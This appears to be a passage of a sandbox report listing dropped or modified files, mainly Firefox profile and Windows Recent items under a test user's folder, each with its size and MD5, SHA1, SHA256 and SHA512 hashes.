SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp
Filesize23KB
MD5ae7c305a3c228d3cc12291c8adf2bfc4
SHA1d88fb4c63a5c1eadc05c53a5f4fc78d463c482ab
SHA2566364157ebedd296ceba1aebda06ede3524fed90fec7551cc656d92a7d578e79d
SHA512b54eb3d473651257faecbe0a28be7472b280b780d13aff61205c587ced20654580cc9ece95f3c2b4b71cd31b9e8d8083f8840bdb642f2e4ef8aac9e3f10765b7
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
120KB
MD55b3ed060facb9d57d8d0539084686870
SHA19cae8c44e44605d02902c29519ea4700b4906c76
SHA2567c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA5126733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a
-
Filesize
15.0MB
MD535a4dfb5f0308d20b1e5bf26e0a70509
SHA10c72b35b74dadbce4a95c034968913de271aae06
SHA25640d3baeb6df3e2cd4eed207e773b21989b86ef547de12a748529c2b559025339
SHA51251b8bf5583a256015daaa8caa9c9868c792ef4a1157b89a6880b365c4c5a1c7416abc2b1fcdde9d1d5d9bb7aaa1c617d5b34124a582ec042ac5a2afa064c60d9
-
Filesize
361KB
MD52bb133c52b30e2b6b3608fdc5e7d7a22
SHA1fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA51273229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f
-
Filesize
275B
MD5c203adcd3b4b1717be1e79d7d234f89c
SHA1a0c726c32766f5d3e3de1bdc9998da2bb2a657e4
SHA256bc953bccc3974ff2a40fd6ce700e499d11bfd2463014786a4cb0f7bac6568ad8
SHA512724f920d5e5f31155629155184a1ccf6299c72da04362062512c154e27bed136292a0af51f423e8e05d8f80426b72f679a01ab9662d4da6ffc06cfcbcd005368
-
Filesize
2.0MB
MD56006ae409307acc35ca6d0926b0f8685
SHA1abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718
-
Filesize
415KB
MD5641525fe17d5e9d483988eff400ad129
SHA18104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA2567a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e
-
Filesize
48KB
MD5d39df45e0030e02f7e5035386244a523
SHA19ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA51269866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64
-
Filesize
350KB
MD5b60779fb424958088a559fdfd6f535c2
SHA1bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f
-
Filesize
11.5MB
MD59da08b49cdcc4a84b4a722d1006c2af8
SHA17b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
SHA512579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb
-
Filesize
1.8MB
MD5f155a51c9042254e5e3d7734cd1c3ab0
SHA19d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA51267ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a
-
Filesize
6.8MB
MD5dab2bc3868e73dd0aab2a5b4853d9583
SHA13dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA5123aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8
-
Filesize
457KB
MD573636685f823d103c54b30bc457c7f0d
SHA1597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA2561edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7
-
Filesize
3.1MB
MD57c169698effcdd45b7cbd763d28e87f5
SHA14f9db666d66255cd7ca2b0973ff00eae8b155f7a
SHA256c7fd445ebedd5cfa9a01daccc7c5771a88f1719b6dbfe16c9f0334fc4371250b
SHA51258335071c6f27e72c8cd505859c9b122ff354395b239697311c1ce17f224c58dd9e2894fbc874c835866a299b3ae9ffab767195a253698fed0d39f3fb15ff8e3
-
Filesize
1.7MB
MD52012699a5e85cd283323c324aa061bc7
SHA169d93116908bf4b6c61a9cb2d3f50a5fbb8cec0f
SHA256937ff3f78062e3aaad013b88bb6e807770d40bb65e538eee9c5de6b1487510b5
SHA512729e7f19b8dc678a8f8912a9ab64169391259fe9d129ba99ef91360f82f81b2c2e628d68a4d5d9c2e4e3fe9e5c09ff295e6021bb3d23a107d6ab59a361d66683
-
Filesize
949KB
MD5e935a122d4c4e9c1b44368821a5154ff
SHA1c93e4b9fb9563cb04a9cd39c75220eaf6007f98f
SHA256161b8b9257159ff8789d47b9a4f5c4b7c6a6e66470392898a8c301348d28cbb4
SHA51275a94d4c73fb917adaae4cc2c8e3a74bc4520cd45b87af146b53aca42b194cd26126ad4a2db5efad2aaa41e2874f8b71d58ebab8752c73039e233c8cd94a7e7f
-
Filesize
1.7MB
MD5e787e8998f5306a754d625d7e29bbeb5
SHA114e056dbf0b3991664910ee3a1d23a4bb2c0253d
SHA25693339b4579800e861b8606cd011c6d919790c72691346eede1aa5d116514672d
SHA51230463019ed1ba9aa0a46623f9068b842161c03f03bbd98da21584abf9c913beade0df4ae758c13f20dcd7937a26f1a6c7c5e6f785c75ce05ea500a7fe6d240f6
-
Filesize
2.8MB
MD5745e4bcf3d176ea5e82a7c26a6733757
SHA1499cf0a28c9469faabae1e0f998c6a9b3e82862f
SHA2568af6936111d0ba881e34ec715d1383dc90c017cd5ca3f51f1d69dc02c0aa2c63
SHA512bd3fe79f49b060ae01766ca3e424a466c5ca652863a00fd23109e177bc7f6b2856eb513ea18ebbf5c3bee8820f817c50fadda44e12fe79656fbe6bb811aba69d
-
Filesize
38KB
MD547177b7fbf1ce282fb87da80fd264b3f
SHA1d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9
-
Filesize
334B
MD53895cb9413357f87a88c047ae0d0bd40
SHA1227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA2568140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc
-
Filesize
5.7MB
MD5ffb5c5f8bab4598fada3bbf92d02d66d
SHA1ae8096c1f160c97874179ea878a61f69bfb9941a
SHA256f3aa764be17f1a197f94b949cfd88f99c2d67e9fec1f53046ef1b6189f594da1
SHA512902e8a95b964ef3a48504dcdb3c4f0615212eb942476ec26b88e02a39cbaaf866f3fcbe5cd4374342b80aae9a7e17092a28dbe1d53630493a0b0cee8152a4ccf
-
Filesize
6.6MB
MD5166cc2f997cba5fc011820e6b46e8ea7
SHA1d6179213afea084f02566ea190202c752286ca1f
SHA256c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA51249d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb
-
Filesize
278B
MD516b0f1ff4a568e2eaee5bc0f74b225ae
SHA1e93ca407f192f3394e62853508b47beaf69d4fb1
SHA25610ca88c5fa2dd89389b1e69c3f70f7b08342fd4e6771de4a9b888ef74f37b1a9
SHA512d2c6241b0613d3f7bb7a47de97def1efffb0cc848aceb07b08131ba13f743299c5ef9b623a940d11d2c7dd68892cd85ecfb65c2c1b58d92db92221eb5548c118
-
Filesize
1.6MB
MD51dc908064451d5d79018241cea28bc2f
SHA1f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA5126f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cebf2b3e5d40ad431f50441119b70dbb
SHA11c96802eaf2a39fc9d5e3677beddf68aad829df2
SHA256b842462014209ac29af76b937c305d3dcb75581155ad1a41e3b3e6fc0eebbe14
SHA512ac690fd5b4192540c544d8cec9b30c831faef51275b6607f9b6a2c5586b1ea51acd06c1b184051345701f163729000f10e497687f9dbfcf1e246bf5420e6024c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD5a6d069317fac86dcea089645da03a774
SHA1e3873b7e7c8256dba2a5c0ef73299fa3d6e10739
SHA256b2ec2cf9504c6a1295211e3904f310ccc34199b1654189f9a5f74e179dad1e16
SHA512da5166d1a9db655b2dddbfc7b8e8a8620c1932b4e7daa376d1e0a265270bc01d4fcb936c1070be21c924f3cfc9bd60acb5fc4225efbd249f9bf9a259fd3fe536
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\ac081f8f-04b0-45e0-9aac-e25e18c2e726
Filesize745B
MD5fda8d62c900d4eff4da53af4e0f43645
SHA1c5b541077a678923978a2d33a6e7dcb6f7e3d101
SHA256c4508a44ccc677828dbd163ad8f1aa9bb2fed8ed9a86ff69fc3b718cb69f3db0
SHA512cc0065aec78e041a67e1973add7f87a383c253a96e523022dbff9ad9a71d921c2d6f168adc50bbb992c39ecb288904997ac161b05fdd6fc12fe6f1f5831c53e4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\b040a549-921e-44b7-903f-2d7e5a1a2d20
Filesize10KB
MD540d41fab08c1b09f80d59994aaf56566
SHA19c797aa1fa2c9271cee99af9a3942df2b1bd2ca8
SHA25690a83b1796a6acbc1da30e3fed79dd779dd4d8afeff12c44eb7f45798c4e18da
SHA5125bec55689ded1ec596b68081c122a223d17bb86f6cfc343f2b00ab97ca709c6308e8f8cbb2c528684ac07961c1f16568a1060e437309969e25b0acee4d20c790
-
Filesize
6KB
MD513410ed1ef0840b0db333ebe922d6454
SHA11e5a1ebc1bed46375f1cde5e09a8019f548ae8ae
SHA2566271a6772f0cfad840b5459c6c2f8da0c7846f4349bef8111cf934ce5b4c3a35
SHA5128dc0c0d2e068edc9806a86f9caa7c0bfc9bd4d592c7a525cc900ab70221eb744c2653ff54e65aa0678fdcfbeb2c39af37eabca55d76b7c29a9f4587cb90059cd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD50e8d437c8951e606b3221594a9993bdc
SHA18fa7d6483c0890e44c293d457cbf4b94045a5d59
SHA25656f571a7f447bd0b41c37d42479758481632de0cb2a33eadae1d0f4986c0b7c4
SHA5121db3048ae9444e855d0be53aea7ce40ee6e6e75561b7922409d0f9e44219487f6dcb10c0b239918625e1eeb58f5b93162c05e7b21082fc0bbe0cc19b8410ea8b
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
1.8MB
MD54cf553af549bd99fa44da57de08620a8
SHA167e04f4434f0a63b082b0c8f148f5c100a77e27f
SHA256d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e
SHA5124ac6fae3a8aeda3a8a0e01d0e59385f674b72ccea57586b007a1a65e810c4063f2ea85a62f002b9fe522c2a986ae7faf2e0f3f5cb5cc5ccbd2a58851df7b2186
-
Filesize
22.0MB
MD50eb68c59eac29b84f81ad6522d396f59
SHA1aacfdf3cb1bdd995f63584f31526b11874fc76a5
SHA256dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f
SHA51281ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7